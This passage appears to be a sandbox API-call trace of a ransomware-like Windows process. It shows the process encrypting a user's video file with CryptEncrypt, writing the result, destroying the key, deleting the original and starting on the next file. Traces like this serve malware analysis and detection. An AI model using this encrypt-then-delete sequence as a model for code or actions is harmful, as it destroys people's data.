returned 1 [0100.002] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0058 | out: hHeap=0x1780000) returned 1 [0100.002] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0100.002] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0100.002] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2848 | out: hHeap=0x1780000) returned 1 [0100.002] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0100.002] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0100.002] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797128 | out: hHeap=0x1780000) returned 1 [0100.002] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca430 | out: hHeap=0x1780000) returned 1 [0100.002] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0100.002] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0100.002] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0100.002] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0100.002] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0100.002] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0100.003] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0100.003] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0100.004] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43ca8f8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0100.004] CryptEncrypt (in: hKey=0x41ac6c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e538*=0xde93, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e538*=0xdea0) returned 1 [0100.004] CharLowerBuffW (in: lpsz="byte[56993]", cchLength=0xb | out: lpsz="byte[56993]") returned 0xb [0100.005] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0100.005] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0100.005] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0100.005] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43ca808, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0100.005] CryptEncrypt (in: hKey=0x41ac6c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x499a008*, pdwDataLen=0x144e538*=0xde93, dwBufLen=0xdea0 | out: pbData=0x499a008*, pdwDataLen=0x144e538*=0xdea0) returned 1 [0100.005] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0100.005] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0100.005] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0100.007] WriteFile (in: hFile=0x298, lpBuffer=0x49df960*, nNumberOfBytesToWrite=0xdea0, lpNumberOfBytesWritten=0x144ef3c, lpOverlapped=0x0 | out: lpBuffer=0x49df960*, lpNumberOfBytesWritten=0x144ef3c*=0xdea0, lpOverlapped=0x0) returned 1 [0100.009] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0100.009] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0100.009] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0100.009] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0100.009] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43ca670, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0100.009] CryptDestroyKey (hKey=0x41ac6c0) returned 1 [0100.009] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0100.009] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0100.009] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0100.009] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0100.010] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0100.010] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0100.010] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0100.106] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0100.106] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0100.106] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0100.106] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1796de8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0100.106] CryptReleaseContext (hProv=0x41a5360, dwFlags=0x0) returned 1 [0100.168] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0100.168] FreeLibrary (hLibModule=0x756e0000) returned 1 [0100.168] CloseHandle (hObject=0x258) returned 1 [0100.168] CloseHandle (hObject=0x298) returned 1 [0100.171] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\oxSznFWHwYcj-6Y.mkv", nBufferLength=0x7fff, lpBuffer=0x143ef38, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\oxSznFWHwYcj-6Y.mkv", lpFilePart=0x0) returned 0x39 [0100.171] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\oxSznFWHwYcj-6Y.mkv" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\oxsznfwhwycj-6y.mkv")) returned 0x20 [0100.171] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\oxSznFWHwYcj-6Y.mkv", lpFindFileData=0x144ef80 | out: lpFindFileData=0x144ef80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6aad530, ftCreationTime.dwHighDateTime=0x1d5e8f3, ftLastAccessTime.dwLowDateTime=0x75221700, ftLastAccessTime.dwHighDateTime=0x1d5e90e, ftLastWriteTime.dwLowDateTime=0x75221700, ftLastWriteTime.dwHighDateTime=0x1d5e90e, nFileSizeHigh=0x0, nFileSizeLow=0xde93, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="oxSznFWHwYcj-6Y.mkv", cAlternateFileName="OXSZNF~1.MKV")) returned 0x41ac500 [0100.171] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\oxSznFWHwYcj-6Y.mkv" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\oxsznfwhwycj-6y.mkv")) returned 1 [0100.219] FindNextFileW (in: hFindFile=0x41ac500, lpFindFileData=0x144ef80 | out: lpFindFileData=0x144ef80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6aad530, ftCreationTime.dwHighDateTime=0x1d5e8f3, ftLastAccessTime.dwLowDateTime=0x75221700, ftLastAccessTime.dwHighDateTime=0x1d5e90e, ftLastWriteTime.dwLowDateTime=0x75221700, ftLastWriteTime.dwHighDateTime=0x1d5e90e, nFileSizeHigh=0x0, nFileSizeLow=0xde93, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="oxSznFWHwYcj-6Y.mkv", cAlternateFileName="OXSZNF~1.MKV")) returned 0 [0100.219] FindClose (in: hFindFile=0x41ac500 | out: hFindFile=0x41ac500) returned 1 [0100.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4369bb8 | out: hHeap=0x1780000) returned 1 [0100.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2420 | out: hHeap=0x1780000) returned 1 [0100.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b90 | out: hHeap=0x1780000) returned 1 [0100.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2360 | out: hHeap=0x1780000) returned 1 [0100.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5250 | out: hHeap=0x1780000) returned 1 [0100.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0100.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c08 | out: hHeap=0x1780000) returned 1 [0100.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e30 | out: hHeap=0x1780000) returned 1 [0100.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf428 | out: hHeap=0x1780000) returned 1 [0100.220] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 1 [0100.220] TranslateMessage (lpMsg=0x144f2dc) returned 0 [0100.220] DispatchMessageW (lpMsg=0x144f2dc) returned 0x0 [0100.220] KillTimer (hWnd=0x502d2, uIDEvent=0x1) returned 1 [0100.220] SetTimer (hWnd=0x502d2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0100.220] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0100.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac280 | out: hHeap=0x1780000) returned 1 [0100.220] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0100.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8ac8 | out: hHeap=0x1780000) returned 1 [0100.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d10 | out: hHeap=0x1780000) returned 1 [0100.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9dd0 | out: hHeap=0x1780000) returned 1 [0100.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e00 | out: hHeap=0x1780000) returned 1 [0100.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2400 | out: hHeap=0x1780000) returned 1 [0100.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf400 | out: hHeap=0x1780000) returned 1 [0100.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ba8 | out: hHeap=0x1780000) returned 1 [0100.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0100.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf360 | out: hHeap=0x1780000) returned 1 [0100.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4314d10 | out: hHeap=0x1780000) returned 1 [0100.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0100.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d40 | out: hHeap=0x1780000) returned 1 [0100.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e18 | out: hHeap=0x1780000) returned 1 [0100.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf388 | out: hHeap=0x1780000) returned 1 [0100.220] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0100.220] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0100.220] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2510 [0100.221] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf400 [0100.221] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0100.221] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf400 | out: hHeap=0x1780000) returned 1 [0100.221] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0100.221] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf360 [0100.221] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2360 [0100.221] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf388 [0100.221] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c38 [0100.221] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0100.221] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b90 [0100.221] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2460 [0100.221] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0100.221] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c80 [0100.221] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2490 [0100.221] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x4369d18 [0100.221] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c80 | out: hHeap=0x1780000) returned 1 [0100.221] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2440 [0100.221] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2440 | out: hHeap=0x1780000) returned 1 [0100.221] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c68 [0100.221] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100) returned 0x4181bc8 [0100.221] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4369d18 | out: hHeap=0x1780000) returned 1 [0100.221] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c68 | out: hHeap=0x1780000) returned 1 [0100.221] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0100.221] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2460 | out: hHeap=0x1780000) returned 1 [0100.221] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0100.221] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9d10 [0100.221] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf400 [0100.221] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ba8 [0100.222] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2380 [0100.222] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d28 [0100.222] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cb0 [0100.222] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0100.222] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0100.222] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2520 [0100.222] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2400 [0100.222] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797008 [0100.222] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797008 | out: hHeap=0x1780000) returned 1 [0100.222] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2400 | out: hHeap=0x1780000) returned 1 [0100.222] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0100.222] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0100.222] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2400 [0100.222] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf428 [0100.222] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d40 [0100.222] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2450 [0100.222] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bc0 [0100.222] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0100.222] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\rggg9G4RHZvsA0kg01.flv", lpFindFileData=0x144ee20 | out: lpFindFileData=0x144ee20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x40a712c0, ftCreationTime.dwHighDateTime=0x1d5e934, ftLastAccessTime.dwLowDateTime=0x5c377970, ftLastAccessTime.dwHighDateTime=0x1d5e278, ftLastWriteTime.dwLowDateTime=0x5c377970, ftLastWriteTime.dwHighDateTime=0x1d5e278, nFileSizeHigh=0x0, nFileSizeLow=0x18f4f, dwReserved0=0x0, dwReserved1=0x8, cFileName="rggg9G4RHZvsA0kg01.flv", cAlternateFileName="RGGG9G~1.FLV")) returned 0x41ac280 [0100.222] FindClose (in: hFindFile=0x41ac280 | out: hFindFile=0x41ac280) returned 1 [0100.222] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bc0 | out: hHeap=0x1780000) returned 1 [0100.222] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d40 | out: hHeap=0x1780000) returned 1 [0100.223] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf428 | out: hHeap=0x1780000) returned 1 [0100.223] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0100.223] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e28 [0100.223] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2440 [0100.223] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43918f8 [0100.223] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0100.223] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43918f8 | out: hHeap=0x1780000) returned 1 [0100.223] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2440 | out: hHeap=0x1780000) returned 1 [0100.223] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf428 [0100.223] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2520 [0100.223] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf450 [0100.223] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d40 [0100.223] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2450 [0100.223] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9da0 [0100.223] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0100.223] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9dd0 [0100.223] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0100.223] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c20 [0100.223] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2410 [0100.223] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c20 | out: hHeap=0x1780000) returned 1 [0100.223] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0100.223] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e00 [0100.223] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e18 [0100.223] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0100.223] PeekMessageW (in: lpMsg=0x144eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eebc) returned 0 [0100.223] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0100.223] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e30 [0100.223] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0100.223] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e48 [0100.223] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bc0 [0100.224] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2390 [0100.224] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bc0 | out: hHeap=0x1780000) returned 1 [0100.224] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0100.224] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391dc8 [0100.224] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0100.224] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391dc8 | out: hHeap=0x1780000) returned 1 [0100.224] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0100.224] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0100.224] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2420 [0100.224] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0100.224] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bc0 [0100.224] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0100.224] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bd8 [0100.224] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0100.224] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e23a0 [0100.224] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bf0 [0100.224] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2430 [0100.224] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2430 | out: hHeap=0x1780000) returned 1 [0100.224] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2430 [0100.224] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c08 [0100.224] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2440 [0100.224] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2440 | out: hHeap=0x1780000) returned 1 [0100.224] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9c20 [0100.224] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0100.224] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c68 [0100.224] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2440 [0100.224] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c68 | out: hHeap=0x1780000) returned 1 [0100.224] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0100.224] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c68 [0100.224] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c80 [0100.225] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0100.225] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c98 [0100.225] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24e0 [0100.225] 